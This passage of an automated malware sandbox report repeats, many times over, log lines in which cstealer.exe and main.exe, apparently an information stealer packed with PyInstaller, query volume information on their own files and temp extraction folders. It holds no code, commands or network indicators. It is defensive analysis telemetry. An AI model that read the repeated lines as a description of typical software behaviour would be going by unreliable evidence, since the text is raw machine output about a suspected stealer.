                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
